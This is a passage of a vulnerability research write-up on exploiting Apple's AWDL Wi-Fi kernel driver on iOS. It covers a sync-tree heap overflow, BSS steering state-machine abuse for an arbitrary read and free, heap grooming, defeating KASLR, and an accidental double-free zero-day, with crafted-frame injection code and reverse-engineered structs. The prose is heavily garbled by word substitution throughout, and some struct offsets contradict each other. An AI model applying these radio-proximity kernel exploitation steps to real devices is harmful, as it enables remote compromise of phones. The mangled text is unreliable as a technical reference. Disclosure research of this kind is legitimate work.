/+0x051B */  uint32_t n_sync_tree_macs;

/+0x0517 */  uint8_t pad20[126];

/+0x059D */  uint8_t peer_infra_channel;

/+0x059E */  struct ether_addr peer_infra_mac;

/+0x05A4 */  struct ether_addr some_other_mac;

/+0x05AA */  uint8_t country_code[3];

/+0x05AD */  uint8_t pad5[41];

/+0x05D6 */  uint16_t social_channels;

/+0x0508 */  uint64_t last_AF_timestamp;

/+0x05E0 */  uint8_t pad17[116];

/+0x0654 */  uint8_t chanseq_encoding;

/+0x0655 */  uint8_t chanseq_count;

/+0x0656 */  uint8_t chanseq_step_count;

/+0x0657 */  uint8_t chanseq_dup_count;

/+0x0658 */  uint8_t pad19[4];

/+0x0650 */  uint16_t chanseq_fill_channel;

/+0x065E */  uint8_t chanseq_channels[32];

/+0x067E */  uint8_t pad2[64];

/+0x06BE */  uint8_t raw_chanseq[64];

/+0x06FE */  uint8_t pad18[194];

/+0x07C0 */  uint64_t last_UMI_update_timestamp;

/+0x0708 */  struct IO80211AWDLPeer *UMI_chain_flink;

/+0x07D0 */  uint8_t pad16[8];

/+0x07D8 */  uint8_t is_in_umichain;

/+0x0709 */  uint8_t pad15[79];

/+0x0828 */  uint8_t datapath_tlv_flags_bit_5_dualband;

/+0x0829 */  uint8_t pad12[2];

/+0x082B */  uint8_t SDB_mode;

/+0x082C */  uint8_t pad6[28];

/+0x0848 */  uint8_t did_parse_datapath_tlv;

/+0x0849 */  uint8_t pad7[1011];

/+0x0C3C */  uint32_t UMI_feature_mask;

/+0x0C40 */  uint8_t pad22[2568];

/+0x1648 */  struct ether_addr sync_tree_macs[10]; // overflowable

/+0x1684 */  uint8_t sync_error_count;

/+0x1685 */  uint8_t had_chanseq_tlv;

/+0x1686 */  uint8_t pad3[2];

/+0x1688 */  uint64_t per_second_timestamp;

/+0x1690 */  uint32_t n_frames_in_last_second;

/+0x1694 */  uint8_t pad21[4];

/+0x1698 */  void *steering_msg_blob;  // NEW FIELD

/+0x16A0 */  uint32_t steering_msg_blob_size;  // NEW FIELD

}

The layout of fields in my reverse-engineered version of IO80211AWDLPeer. You also can interpret and edit structures in C-syntax enjoy this the utilization of the Local Forms window in IDA: upright-clicking a form and choosing “Edit…” brings up an interactive edit window; it be very critical for reversing complicated info structures such as this.

There are contemporary fields! Of direction, there could be a brand contemporary pointer discipline and length discipline upright at the discontinue of the IO80211AWDLPeer object. However what’s a steering_msg_blob? What is BSS Guidance?

Let’s pick a scrutinize at the put the steering_msg_blob pointer is faded.

It’s allocated in IO80211AWDLPeer::populateBssSteeringMsgBlob, through the next call stack:

IO80211PeerBssSteeringManager::processPostSyncEvaluation

IO80211PeerBssSteeringManager::bssSteeringStateMachine

bssSteeringStateMachine is called from many areas, in conjunction with IO80211AWDLPeer::actionFrameReport when it parses a BSS Guidance TLV (form 0x1d), so it looks enjoy we can certainly force this pronounce machine remotely in some way.

The steering_msg_blob pointer is freed in IO80211AWDLPeer::freeResources when the IO80211AWDLPeer object is destroyed:

  steering_msg_blob=this->steering_msg_blob;

  if ( steering_msg_blob )

  {

    kfree(steering_msg_blob, this->steering_msg_blob_size);

This provides us our first contemporary frail: an arbitrary free. Without wanting to reverse any of the BSS Guidance code we can rather without complications overflow from the sync_tree_macs discipline into the steering_msg_blob and steering_msg_blog_size fields, environment them to arbitrary values.

If we then anticipate the ogle to timeout and be destroyed, when ::freeResources is called this could perchance presumably perchance call kfree with our arbitrary pointer and size.

The steering_msg_blob is moreover faded in every other put:

In IO80211AWDLPeerManager::handleUmiTimer the IO80211AWDLPeerManager walks a linked-list of guests (a separate linked-list from that faded to store all of the guests) and from every of the guests in that list it checks whether that ogle and the present instrument are on the identical channel and in an availability window:

if ( peer_manager->current_channel_==ogle->chanseq_channels[peer_manager->current_chanseq_step] ) {

If the UMI timer has certainly fired when both this instrument and the ogle from the UMI list are on the identical channel in an overlapping availability window then the IO80211AWDLPeerManager eliminates the ogle from the UMI list, reads the bss_steering_blob from the ogle and passes it because the closing argument to the ogle’s::sendUnicastMI capability.

This passes that blob to IO80211AWDLPeerManager::buildMasterIndicationTemplate to manufacture an AWDL master indication physique ahead of attempting to transmit it.

Let’s scrutinize at how buildMasterIndicationTemplate uses the steering_msg_blob:

The third argument to buildMasterIndicationTemplate is is_unicast_MI which signifies whether this implies modified into called by IO80211AWDLPeerManager::sendUnicastMI (which sets it to 1) or IO80211AWDLPeerManager::updatePrimaryPayloadMI (which sets it to 0.)

If buildMasterIndicationTemplate modified into called to manufacture a unicast MI physique and the ogle’s feature_mask discipline has 0xD‘th bit put then the steering_msg_blob will likely be passed to IO80211AWDLPeerManager::buildMultiPeerBssSteeringTlv. This implies reads a size from the 2nd dword in the steering_msg_blob and checks whether it is miles smaller than the closing location in the physique template buffer; whether it is miles, then that size imprint is faded to repeat that series of bytes from the steering_msg_blob pointer into a TLV (form 0x1d) in the template physique that can then be despatched out over the air!

There could be clearly a course right here to catch a semi-arbitrary learn; nonetheless undoubtedly triggering this could perchance presumably perchance require rather procedure more reversing. We need the UMI timer to be firing and we moreover favor to catch a ogle into the UMI linked list.

At this point a shining request to interrogate is, what precisely is BSS Guidance? A little bit of of googling tells us that it be section of 802.11v; a put of management standards for endeavor networks. One amongst the developed ingredients of endeavor networks is the capability to seamlessly switch devices between various catch entry to suggestions which form section of the identical network; to illustrate must you stroll across the put of business with your phone or if there are too many devices related to 1 catch entry to point. AWDL is rarely always section of 802.11v. My simplest wager as to what’s occurring right here is that AWDL is driving the 802.11v AP roaming code to set up out to switch AWDL purchasers on to a recent infrastructure network. I have confidence this code modified into added to enhance Sidecar, nonetheless every thing below is basically based only on static reversing.

IO80211PeerBssSteeringManager::bssSteeringStateMachine is in price of driving the BSS guidance pronounce machine. The first argument is a bssSteeringEvent enum imprint representing an tournament which the pronounce machine must aloof direction of. Using the IO80211PeerBssSteeringManager::getEventName capability we can resolve the names for all of the events which the pronounce machine will direction of and the utilization of the IO80211PeerBssSteeringManager::getStateName capability we can resolve the names of the states which the pronounce machine is at risk of be in. Again the utilization of the local forms window in IDA we can interpret enums for these that can form the HexRays decompiler output procedure more readable:

enum BSSSteeringState

{

  BSS_STEERING_STATE_IDLE=0x0,

  BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL=0x1,

  BSS_STEERING_STATE_ASSOCIATION_ONGOING=0x2,

  BSS_STEERING_STATE_TX_CONFIRM_AWAIT=0x3,

  BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT=0x4,

  BSS_STEERING_STATE_STEERING_SYNCED=0x5,

  BSS_STEERING_STATE_STEERING_SYNC_FAILED=0x6,

  BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING=0x7,

  BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL=0x8,

  BSS_STEERING_STATE_SUSPEND=0x9,

  BSS_STEERING_INVALID=0xA,

};

enum bssSteeringEvent

{

 BSS_STEERING_MODE_ENABLE=0x0,

 BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD=0x1,

 BSS_STEERING_DO_PRESYNC_EVAL=0x2,

 BSS_STEERING_PRESYNC_EVAL_DONE=0x3,

 BSS_STEERING_SELF_INFRA_LINK_CHANGED=0x4,

 BSS_STEERING_DIRECTED_STEERING_CMD_SENT=0x5,

 BSS_STEERING_DIRECTED_STEERING_TX_CONFIRM_RXED=0x6,

 BSS_STEERING_SYNC_CONFIRM_ATTEMPT=0x7,

 BSS_STEERING_SYNC_SUCCESS_EVENT=0x8,

 BSS_STEERING_SYNC_FAILED_EVENT=0x9,

 BSS_STEERING_OVERALL_STEERING_TIMEOUT=0xA,

 BSS_STEERING_DISABLE_EVENT=0xB,

 BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT=0xC,

 BSS_STEERING_SELF_STEERING_REQUESTED=0xD,

 BSS_STEERING_SELF_STEERING_DONE=0xE,

 BSS_STEERING_SUSPEND_EVENT=0xF,

 BSS_STEERING_RESUME_EVENT=0x10,

 BSS_STEERING_REMOTE_STEERING_TRIGGER=0x11,

 BSS_STEERING_PEER_INFRA_LINK_CHANGED=0x12,

 BSS_STEERING_REMOTE_STEERING_FAILED_EVENT=0x13,

 BSS_STEERING_INVALID_EVENT=0x14,

};

The present pronounce is maintained in a guidance context object, owned by the IO80211PeerBssSteeringManager. Reverse engineering the pronounce machine code we can reach up with the next tough definition for the guidance context object:

struct __attribute__((packed)) BssSteeringCntx

{

  uint32_t first_field;

  uint32_t service_type;

  uint32_t peer_count;

  uint32_t role;

  struct ether_addr peer_macs[8];

  struct ether_addr infraBSSID;

  uint8_t pad4[6];

  uint32_t infra_channel_from_datapath_tlv;

  uint8_t pad8[8];

  char ssid[32];

  uint8_t pad1[12];

  uint32_t num_peers_added_to_umi;

  uint8_t pad_10;

  uint8_t pendingTransitionToNewState;

  uint8_t pad7[2];

  enum BSSSteeringState current_state;

  uint8_t pad5[8];

  struct IOTimerEventSource *bssSteeringExpiryTimer;

  struct IOTimerEventSource *bssSteeringStageExpiryTimer;

  uint8_t pad9[8];

  uint32_t steering_policy;

  uint8_t inProgress;

};

Our purpose right here is reach IO80211AWDLPeer::populateBssSteeringMsgBlob which is called by IO80211PeerBssSteeringManager::processPostSyncEvaluation which is called when the pronounce machine is in the BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL pronounce and receives the BSS_STEERING_PRESYNC_EVAL_DONE tournament.

Every time a pronounce is evaluated it can perchance trade the present pronounce and optionally put the stateMachineTriggeredEvent variable to a brand contemporary tournament and put sendEventToNewState to 1. This kind the pronounce machine can force itself forwards to a brand contemporary pronounce. Let’s strive to search out the course to our purpose pronounce:

The pronounce machine begins in BSS_STEERING_STATE_IDLE. After we ship the BSS guidance TLV for the first time this injects both the BSS_STEERING_REMOTE_STEERING_TRIGGER or BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD tournament counting on whether the steeringMsgID in the TLV modified into modified into 6 or 0.

This causes a call to IO80211PeerBssSteeringManager::processBssSteeringEnabled which parses a steering_msg structure which itself modified into parsed from the bss guidance tlv; we’ll pick a scrutinize at both of these in a moment. If the guidance supervisor is contented with the contents of the steering_msg structure from the TLV it begins two IOTimerEventSources: the bssSteeringExpiryTimer and the bssSteeringStageExpiryTimer. The SteeringExpiry timer will abort your entire guidance direction of when it triggers, which occurs after a few seconds. The StageExpiry timer lets in the pronounce machine to form growth asynchronously. When it expires this could perchance presumably perchance call the IO80211PeerBssSteeringManager::bssSteeringStageExpiryTimerHandler feature, a snippet of which is shown right here:

  cntx=this->steering_cntx;

  if ( cntx && cntx->pendingTransitionToNewState )

  {

    current_state=cntx->current_state;

    switch ( current_state )

    {

      case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

        tournament=BSS_STEERING_DO_PRESYNC_EVAL;

        damage;

      case BSS_STEERING_STATE_ASSOCIATION_ONGOING:

      case BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING:

        tournament=BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT;

        damage;

      case BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT:

        tournament=BSS_STEERING_SYNC_CONFIRM_ATTEMPT;

        damage;

      default:

        goto ERR;

    }

    consequence=this->bssSteeringStateMachine(this, tournament, …

We can scrutinize right here the four pronounce transitions that also can happen asynchronously in the background when the StageExpiry timer fires and causes events to be injected.

From BSS_STEERING_STATE_IDLE, after the timers are initialized the code sets the pendingTranstionToNewState flag and updates the pronounce to BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

  this->steering_cntx->pendingTransitionToNewState=1;

  pronounce=BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL;

We can now scrutinize that this also can simply reason the the BSS_STEERING_DO_PRESYNC_EVAL tournament to be injected into the guidance pronounce machine and we reach the next code:

  case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

   {

     if ( EVENT==BSS_STEERING_DO_PRESYNC_EVAL ) {

       steering_policy=this->processPreSyncEvaluation(cntx);

       …

Right here the BSS guidance TLV gets parsed and reformatted into a layout reliable for the BSS guidance code, presumably that is the compatibility layer between the 802.11v endeavor WiFi BSS guidance code and AWDL.

We need the IO80211PeerBssSteeringManager::processPreSyncEvaluation to reach support a steering_policy imprint of 7. The code which determines that is extremely complicated; in the discontinue it looks that if the purpose instrument is for the time being connected to a 5Ghz network on a non-DFS channel then we can catch it to reach support the upright guidance coverage imprint to reach BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL. DFS channels are dynamic and is at risk of be disabled at runtime if radar is detected. There could be no requirement that the attacker is moreover on the identical 5GHz network. There can also moreover be every other course to reach the well-known pronounce nonetheless this also can simply construct.

At this point we indirectly reach processPostSyncEvaluation and the steeringMsgBlob will likely be allocated and the UMI timer armed. When it begins firing the code will strive to learn the steering_msg_blob pointer and ship the buffer it suggestions to over the air.

Let’s scrutinize concretely at what’s required for the learn:

We need two spoofer guests:

struct ether_addr reader_peer=*(ether_aton(“22: 22:aa: 22: 00: 00”));

struct ether_addr steerer_peer=*(ether_aton(“22: 22:bb: 22: 00: 00”));

The purpose instrument desires to be attentive to both these guests so we allocate the reader ogle by spoofing a physique from it:

inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       CHAN_SEQ_EMPTY(),

       HT_CAPS(),

       UNICAST_DATAPATH(0x1307 | 0x800),

       PKT_END());

There are two well-known things right here:

1) This ogle can have a channel sequence which is empty; that is important as it capability we can build in power a hole between the allocation of the steering_msg_blob by processPostSyncEvaluation and its utilize in the UMI timer. Take that we saw earlier that the unicast MI template only gets constructed when the UMI timer fires for the period of a ogle availability window; if the ogle has no availability windows, then the template can also simply no longer be up in the past and the steering_msg_blob can also simply no longer be faded. We can without complications trade the channel sequence later by sending a clear TLV.

2) The flags in the UNICAST_DATAPATH TLV. That 0x800 is extremely well-known, without it this occurs:

This tweet from @mdowd on Could well 27th 2020 talked about a double free in BSS reachable through AWDL

We will catch to that…

The subsequent step is to allocate the steerer_peer and start guidance the reader:

inject(RT(),

      WIFI(dst, steerer_peer),

      AWDL(),

      SYNC_PARAMS(),

      HT_CAPS(),

      UNICAST_DATAPATH(0x1307),

      BSS_STEERING(&reader_peer, 1),

      PKT_END());

Let’s scrutinize at the bss_steering TLV:

struct bss_steering_tlv {

  uint8_t form;

  uint16_t length;

  uint32_t steeringMsgID;

  uint32_t steeringMsgLen;

  uint32_t peer_count;

  struct ether_addr peer_macs[8];

  struct ether_addr BSSID;

  uint32_t steeringTimeoutThreshold;

  uint32_t SSID_len;

  uint8_t infra_channel;

  uint32_t steeringCmdFlags;

  char SSID[32];

} __attribute__((packed));

We favor to in moderation grab these values; the well-known section for the exploit on the opposite hand is that we can specify up to 8 guests to be instructed at the identical time. For this instance we’ll loyal steer one ogle. Right here we manufacture a bss_steering_tlv with only one peer_mac put to the mac take care of of reader_peer. If we have put every thing up accurately this must aloof reason the IO80211AWDLPeer for the reader_peer object to allocate a steering_msg_blob and start the UMI timer firing attempting to ship that blob in a UMI

UMI?

UMIs are Unicast Grasp Indication frames; unlike contemporary AWDL Grasp Indication frames UMIs are despatched to unicast MAC addresses.

We can now ship a final physique:

char overflower[0x80]={0};

*(uint64_t*)(&overflower[0x50])=0x4141414141414141;

inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       SERV_PARAM(),

       HT_CAPS(),

       DATAPATH(reader_peer),

       SYNC_TREE((struct ether_addr*)overflower,

                  sizeof(overflower)/sizeof(struct ether_addr)),

       PKT_END());

There are two well-known ingredients to this physique:

1) We have integrated a SyncTree TLV that can trigger the buffer overflow. SYNC_TREE will copy the MAC addresses in overflower into the sync_tree_macs inline buffer in the IO80211AWDLPeer:

/+0x1648 */  struct ether_addr sync_tree_macs[10];

/+0x1684 */  uint8_t sync_error_count;

/+0x1685 */  uint8_t had_chanseq_tlv;

/+0x1686 */  uint8_t pad3[2];

/+0x1688 */  uint64_t per_second_timestamp;

/+0x1690 */  uint32_t n_frames_in_last_second;

/+0x1694 */  uint8_t pad21[4];

/+0x1698 */  void *steering_msg_blob;

/+0x16A0 */  uint32_t steering_msg_blob_size;

sync_tree_macs is at offset +0x1648 in the IO80211AWDLPeer object and the steering_msg_blob is at +0x1698 so by inserting our arbitrary learn purpose 0x50 bytes in to the SYNC_TREE tlv we’ll overwrite the steering_msg_blob, in this case with the imprint 0x4141414141414141.

2) The opposite well-known section is that we no longer ship the CHAN_SEQ_EMPTY TLV, that means this ogle will utilize the channel sequence in the sync_params TLV. This incorporates a channel sequence the put the ogle broadcasts they’re listening in every Availability Window (AW), that means that the next time the UMI timer fires whereas the purpose instrument is moreover in an AW this could perchance presumably perchance learn the corrupted steering_msg_blob pointer and strive to manufacture a UMI the utilization of it. If we sniff for UMI frames coming from the purpose MAC take care of (dst in this instance) and parse out TLV 0x1d we’ll fetch our (nearly) arbitrarily learn memory!

On this case needless to claim attempting to learn from an take care of enjoy 0x4141414141414141 will nearly with no doubt reason a kernel terror, so we have aloof bought more work to construct.

There are some well-known limitations for this learn formulation: at first, the steering_msg_blob has its length because the 2nd dword member and that length will likely be faded because the length of memory to repeat into the UMI. This implies that we can only learn from areas the put the 2nd dword pointed to is a tiny imprint lower than round 800 (the on hand location in the UMI physique.) That size moreover dictates how a lot will likely be learn. We can work with this as an initial arbitrary learn frail on the opposite hand.

The 2nd limitation is the price of these reads; in expose to manual more than one guests at the identical time and therefore fetch more than one reads in parallel we’ll need some more tricks. For now, the most spirited probability is to anticipate guidance to fail and restart the guidance direction of. This takes round 8 seconds, after which the guidance direction of is at risk of be restarted by the utilization of a steeringMsgId imprint of 0 rather then 6 in in the BSS_STEERING TLV. 

At this point we can catch memory despatched support to us provided it meets some requirements. Helpfully if the memory doesn’t meet these requirements as lengthy because the virtual take care of modified into mapped and readable the code can also simply no longer smash so we have some leeway.

My first thought right here modified into to make utilize of the physmap, an (nearly) 1:1 virtual mapping of the physical take care of location in virtual memory. The imperfect of the physmap take care of is randomized on iOS nonetheless the scamper is smaller than the physical take care of location size, that means there could be a virtual take care of in there that it is doubtless you’ll consistently learn from. This provides you a stable virtual take care of to dereferences to begin attempting to fetch tricks to utilize.

It modified into round this point in the pattern of the exploit that Apple released iOS 13.3.1 which patched the heap overflow. I wished to moreover begin as a minimum some roughly demo at this point so I released a extremely contemporary proof-of-thought which drove the BSS Guidance pronounce machine a ways enough to learn from the physmap alongside with barely of javascript snippet it is doubtless you’ll presumably perchance perchance presumably streak in Safari to spray physical memory to converse that you undoubtedly had been reading person info. In spite of every thing, this is rarely always all that compelling; the more compelling demo is aloof a few months down the avenue.

Discussing these complications with fellow Mission Zero researchers Brandon Azad and Jann Horn, Brandon talked about that on iOS the imperfect of the zone scheme, faded for most contemporary kernel heap allocations, wasn’t very randomized the least bit. I had checked out this the utilization of DTrace on MacOS and it gave the influence rather randomized, nonetheless dumping kernel layout info on iOS is rarely always rather as trivial as environment a boot argument to disable SIP and enable kernel DTrace.

Brandon had no longer too lengthy previously performed the exploit for his oob_timestamp trojan horse and as section of that he’d made a spreadsheet exhibiting diversified values such because the imperfect of the zone and kalloc maps across more than one reboots. And certainly, the randomization of the imperfect of the zone scheme is extremely minimal, round 16 MB:

kASLR

sane_size

zone_min

zone_max

04da4000

72fac000

ffffffe000370000

ffffffe02b554000

080a4000

73cac000

ffffffe0007bc000

ffffffe02be80000

08b28000

73228000

ffffffe00011c000

ffffffe02b3ec000

0bbb0000

721a4000

ffffffe0005bc000

ffffffe02b25c000

0c514000

7383c000

ffffffe000650000

ffffffe02bb68000

0d4d4000

72880000

ffffffe0002d8000

ffffffe02b208000

107d4000

7357c000

ffffffe00057c000

ffffffe02b98c000

12c08000

73148000

ffffffe000598000

ffffffe02b814000

13fb8000

71d98000

ffffffe000714000

ffffffe02b230000

184fc000

73854000

ffffffe00061c000

ffffffe02bb3c000

Using the Carrier Response Descriptor TLV formulation we can allocate 16MB of memory in precisely a handful of frames, that means we must always aloof stand an realistic likelihood of being ready to securely fetch our allocations on the heap.

What would we enjoy to learn? We have talked about ahead of that in expose to securely rotten the fields after the vtable in the IO80211AWDLPeer object we’ll favor to perceive a PAC’ed vtable pointer so we would enjoy to learn with no doubt one of these. If we’re ready to search out with no doubt one of these we’ll moreover know the take care of of as a minimum 1 IO80211AWDLPeer object.

Whereas you happen to form enough allocations of a specific size in iOS they’ll tend to lope from lower addresses to better addresses. Apple has presented diversified tiny randomizations into precisely how objects are allocated nonetheless they’re no longer related if we loyal stare the total pattern, which is to set up out to procure the virtual memory condo reserved for the zone scheme from bottom to high.

Because the utmost scamper imprint of the zone scheme is smaller than its size there will likely be a virtual take care of which is consistently for the period of the zone scheme

The insufficient randomization of the zone scheme imperfect provides us rather a huge virtual memory put I’ve dubbed the stable probe put the put, provided we lope roughly from low to excessive we can safely learn.

Our heap groom is as follows:

We ship a huge series of service_response TLVs, every of which has the next form:

struct service_response_16k_id_tlv sr={0};

sr.form=2;

sr.len=sizeof(struct service_response_16k_id_tlv) – 3;

sr.s_1=2;

sr.key_buf[0]=’A’;

sr.key_buf[1]=’B’;

sr.v_1=0x4000;

sr.v_2=0x1648; // offset

sr.val_buf[0]=6;  // msg_type

sr.val_buf[1]=0x320; // msg_id

sr.val_buf[2]=0x41414141; // marker

sr.val_buf[3]=val; // imprint

Every of these TLVs causes the purpose instrument to form a 16KB kalloc allocation (one physical internet page) and then at offset +0x1648 in there write the next 4 dwords:

6

0x320

0x41414141

counter

The counter imprint increments by one for every TLV we ship.

We build 39 of these TLVs in every physique that can lead to the allocation of 39 physical pages, or over 600kb, for every AWDL physique we ship, permitting us to without warning allocate memory.

We split the groom into three sections, first sending a series of these spray frames, then a series of spoofed guests to reason the allocation of a huge series of IO80211AWDLPeer objects. Ultimately we ship every other big series of the provider response TLVs.

This results in a memory layout approximating this:

One day of the stable probe put we purpose to construct a series of IO80211AWDLPeer objects, surrounded by service_response groom pages with roughly incrementing counter values

If we now utilize the BSS Guidance arbitrary learn frail to learn from cease to the bottom of the stable probe put at offset +0x1648 from internet page boundaries, we must always aloof optimistically soon fetch with no doubt one of many service_response TLV buffers. Since every service_response groom incorporates a uncommon counter which we can then learn, we can form a wager for the space between this figured out service_response buffer and the heart of the put we predict purpose guests will likely be and so compute a brand contemporary wager for the positioning of a purpose ogle. This kind lets us construct one thing enjoy a binary search to search out an IO80211AWDLPeer object fairly effectively

Why did I grab to learn from offset +0x1648? Because that’s moreover the offset of the sync_tree_macs buffer in the IO80211AWDLPeer the put we can put arbitrary info. Every of these center purpose guests is created enjoy this:

struct peer_fake_steering_blob {

  uint32_t msg_id;

  uint32_t msg_len;

  uint32_t magic; // 0x43434343==ogle

  struct ether_addr mac; // the MAC of this ogle

  uint8_t pad[32];

} __attribute__((packed));

struct peer_fake_steering_blob fake_steerer={0};

fake_steerer.msg_id=6;

fake_steerer.msg_len=0x320;

fake_steerer.magic=0x43434343;

fake_steerer.mac=target_groom_peer;

inject(RT(),

  WIFI(dst, target_groom_peer),

  AWDL(),

  SYNC_PARAMS(),

  SERV_PARAM(),

  HT_CAPS(),

  DATAPATH(target_groom_peer),

  SYNC_TREE((struct ether_addr*)&fake_steerer,

            sizeof(struct peer_fake_steering_blob)

              /sizeof(struct ether_addr)),

  PKT_END());

The magic imprint 0x43434343 lets us resolve whether our learn has figured out a service_response buffer or a ogle. Following that we build the spoofed MAC take care of of this ogle. This lets in us to resolve which ogle has the take care of we guessed. If we construct organize to search out a ogle allocation we can then stare the closing bytes of disclosed memory; there could be a excessive probability that following this ogle is every other ogle, and we have disclosed the first few dozen bytes of it. Right here’s a hexdump of a successfully located ogle:

An annotated hexdump of the disclosed memory when two neighbouring IO80211AWDLPeer objects are figured out. Right here that it is doubtless you’ll scrutinize the runtime values of the fields in the ogle header, in conjunction with the PAC’ed vtable pointer

We can scrutinize right here that we have managed to search out two guests subsequent to 1 every other. We will call these lower_peer and upper_peer. By inserting every sprayed ogle’s MAC take care of in the sync_tree_macs array we’re ready to resolve both lower_peer and upper_peer‘s MAC take care of. Since we know which guessed virtual take care of we chose we moreover know the virtual addresses of lower_peer and upper_peer, and from the PAC’ed vtable pointer we can compute the KASLR scamper.

From now on we can without complications and over and over rotten the fields considered above by sending a huge sync tree TLV containing a modified version of this dumped memory:

Using the disclosed memory we can safely manipulate the lower fields in upper_peer the utilization of the SyncTree buffer overflow

Accidental 0day 1 of two

Correct by procedure of my experiments to catch the BSS Guidance pronounce machine working and into the desired pronounce the put it can presumably perchance perchance ship UMIs, I realized that the purpose instrument would customarily kernel terror, even once I modified into very clear that I hadn’t precipitated the heap overflow vulnerability. Because it looks, I modified into unintentionally triggering every other zero-day vulnerability…

oops!

This modified into honest a minute referring to as it had now been months since I had reported the first AWDL-basically based vulnerability to Apple and a fix for that had already shipped. One my early hopes for Mission Zero would be that shall we have a “learn amplification” construct: we could presumably perchance perchance make investments fundamental effort in publicly much less-understood areas of vulnerability learn and exploitation and present our results to the affected distributors who would then utilize their a glorious deal better resources to proceed this learn. Distributors have resources such as source code and fabricate paperwork which must aloof form it vastly more straightforward to audit many of these attack surfaces – we is at risk of be alive to to attend in this 2nd fragment as effectively.

A more pragmatic peep of truth is that whereas the protection and product groups construct want to proceed our learn, and construct have many more resources, the one well-known resource they lack is time. Justifying the advantages of fixing a vulnerability that can change into public in 90 days is easy nonetheless extracting the utmost imprint from that exterior portray by investing a first-rate period of time is a lot tougher to give an explanation for; these groups have already bought other objectives and targets for the quarter. Time is the important thing resource which makes Mission Zero a hit; we construct no longer have to construct vulnerability triage, or fabricate review, or fix bugs or any of the opposite things contemporary product safety groups have to construct.

I mention this because I stumbled over (and reported to Apple) no longer one nonetheless two more remotely-exploitable radio-proximity 0-day vulnerabilities for the period of this learn, the first of which looks to had been as a minimum on some level identified about:

Ticket Dowd is the co-founder of Azimuth, an Australian “market-main info safety trade”. 

It’s effectively identified to all vulnerability researchers that the very best formulation to search out a brand contemporary vulnerability is to scrutinize very closely at the code cease to a vulnerability which modified into no longer too lengthy previously fastened. They are infrequently isolated incidents and customarily point to a scarcity of testing or understanding across a entire condo.

I’m emphasising this point because Ticket Dowd’s tweet above is claiming info of a variant that wasn’t so complicated to search out. One which modified into so easy to search out, undoubtedly, that it falls out by likelihood must you form the slightest mistake when doing BSS Guidance. 

We saw the feature IO80211AWDLPeer::populateBssSteeringMsgBlob earlier; it be in price of allocating and populating the steering_msg_blob buffer that can discontinue up because the contents of the 0x1d TLV despatched in a AWDL BSS Guidance UMI.

On the starting of the feature they test whether this ogle already has steering_msg_blob:

if (this->steering_msg_blob && this->steering_msg_blob_size) {

  …

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob=0LL;

}

If it does have one it gets free’d and NULL-ed out.

They then compute the size of the contemporary steering_msg_blob, allocate it and procure it in:

steering_blob_size=*(_DWORD *)(msg + 0x3C) + 0x4F;

this->steering_msg_blob=kalloc(steering_blob_size);

this->steering_blob_size=steering_blob_size;

All okay.

Appropriate at the discontinue of the feature they then strive to be able to add the ogle to the “UMI chain” – that is that this other linked list of guests with pending UMIs which we saw earlier:

err=0;

if (this->addPeerToUmiChain()) {

  if ( peer_manager

      && peer_manager->isSafeToSendUmiNow(

  this->chanseq_channels[peer_manager->current_chanseq_step + 1],0)) {

    err=0;

    // in a shared AW; power UMI timer to expire now

    peer_manager->UMITimer->setTimeoutMS(0)

  }

} else {

  kfree(this->steering_msg_blob, this->steering_msg_blob_size);

  this->UMI_feature_mask=0;

  err=0xE00002BC;

}

return err;

If the ogle gets successfully added to the UMI chain, they test whether they would perchance presumably also simply ship the UMI upright now (if both this instrument and the purpose are in AW’s on the identical channel). In that case, they power the UMI timer to expire, which triggers the code we saw earlier to learn the steering_msg_blob, manufacture the UMI template and ship it.

Alternatively, if addPeerToUmiChain fails then the steering_msg_blob is freed. However unlike the sooner kfree, this time they construct no longer NULL out the pointer ahead of returning. The vulnerability right here is that that discipline is anticipated to be the proprietor of that allocation; so if we can in some way reach support into populateBssSteeringMsgBlob again this identical imprint will likely be freed a 2nd time.

There could be a honest proper more straightforward formulation to trigger a double-kfree on the opposite hand: by doing nothing.

After a period of pronounce of no activity the IO80211AWDLPeer object will likely be destructed and free’d. As section of that the IO80211AWDLPeer::freeResources will likely be called, which does this:

steering_msg_blob=this->steering_msg_blob;

if ( steering_msg_blob ) {

  kfree(steering_msg_blob, this->steering_msg_blob_size);

  this->steering_msg_blob=0LL;

  this->steering_msg_blob_size=0;

}

It will scrutinize a imprint for steering_msg_blob which has already been freed and free it a 2nd time. If an attacker had been ready to reallocate the buffer in between the two frees they would perchance presumably also simply catch that controlled object freed, main to a utilize-after-free.

It undoubtedly took some reversing effort to work out form addPeerToUmiChain no longer fail. The trick is that the ogle desires to have despatched a datapath TLV with the 0x800 flag put in the first dword, and that’s why we put that flag.

This vulnerability moreover opens a clear probability for the initial memory disclosure. By guidance more than one guests it be which that that it is doubtless you’ll recall to mind to make utilize of this to manufacture a frail the put the purpose instrument will strive to ship a UMI containing memory from a steering_msg_blob which has been freed. With some heap grooming this could perchance presumably perchance enable the disclosure of both a historical allocation as effectively as out-of-bounds info without wanting to wager pointers. Within the discontinue I chose to persist with the low zone_map entropy formulation as I moreover wanted to set up out to land this faraway kernel exploit the utilization of only a single vulnerability.

We will catch support to the exploit now and test out accidental 0day 2 of two later on…

We have considered that the ogle objects appear to be accessed customarily in the background, no longer loyal once we’re sending frames. Right here is important to endure in suggestions as we perceive our subsequent corruption purpose.

One probability can also simply be to make utilize of the arbitrary free frail. Perchance shall we free a ogle object nonetheless this could perchance be complicated because the memory allocator would write metadata over the vtable pointer and the ogle is at risk of be faded in the background ahead of we bought an opportunity to form sure it modified into stable.

